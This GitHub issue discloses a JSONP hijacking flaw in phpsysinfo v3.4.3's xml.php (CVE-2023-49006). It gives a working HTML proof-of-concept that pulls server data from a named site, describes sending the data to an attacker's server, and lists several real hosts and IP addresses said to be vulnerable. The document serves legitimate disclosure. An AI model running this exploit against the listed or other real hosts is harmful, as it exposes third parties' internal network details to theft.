search

Hebing123 / cve

0 stars 0 forks source link

XML.php JSONP hijacking in phpsysinfo v3.4.3 #5

Open Hebing123 opened 11 months ago

Hebing123 commented 11 months ago

Description

phpsysinfo v3.4.3 has JSONP vulnerability.The XML.php file has a JSONP hijacking vulnerability. When a user visits a page carefully crafted by the attacker, the JSON data is obtained and sent to the attacker.

Proof of Concept

We created an HTML file as a proof of concept to showcase the vulnerability. This HTML file will attempt to retrieve the JSON data from https://phpbb.trabitechnik.com/xml.php and display it in a pop-up window.

Of course, in a real-world attack, an attacker would simply use a PHP file to send the retrieved JSON data to their server using an XMLHttpRequest.

Here is the HTML code for the proof of concept file:

<!DOCTYPE html> 
<html> 
<head> 
<meta charset="utf-8"> 
<title></title> 
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script> 
</head> 
<body> 
<script> 
function dezsbrxdio(data){ alert(JSON.stringify(data)); } 
</script> 
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script> 
</body>
 </html>

Here are some online assets using phpsysinfo that I have found: https://server.wxp-3.nl/xml.php https://sysinfo.pouserinet.fi/xml.php https://zvoyc1uy16u7hu9e.myfritz.net/xml.php http://204.11.55.179/xml.php http://204.11.55.87/xml.php http://88.67.242.79/xml.php http://217.131.251.40/xml.php

If we want to easily test whether a website is vulnerable to this exploit, we can simply replace "phpbb.trabitechnik.com" in the HTML file(POC) with the URL of the website we want to test. We can open the modified HTML file and check if a pop-up window is displayed with the JSON data retrieved from the website. If a pop-up window appears with the JSON data, then the website is vulnerable to the JSONP hijacking exploit.

Impact

If a website's internal network information or other sensitive data is exposed through JSONP and vulnerable to hijacking, the consequences could be severe.

An attacker could potentially retrieve sensitive information such as IP addresses, server names, network topologies, and other data that could be used to map out the internal network structure. This information could then be used to identify additional targets within the network and launch more targeted attacks.

In addition, if the website is part of a larger system or network, the attacker could use the information obtained through JSONP hijacking to gain access to other systems or sensitive data within the network.

Overall, the potential consequences of JSONP hijacking are significant and can lead to a range of security issues and data breaches. It is important for website administrators to ensure that their systems are not vulnerable to this exploit and to take appropriate measures to mitigate the risk.

benharvie marked this as fixed in 4f2cee505e4f2e9b369a321063ff2c5e0c34ba45 with commit 4f2cee 4 months ago

Hebing123 commented 10 months ago

This is the vulnerability exploitation reference for CVE-2023-49006.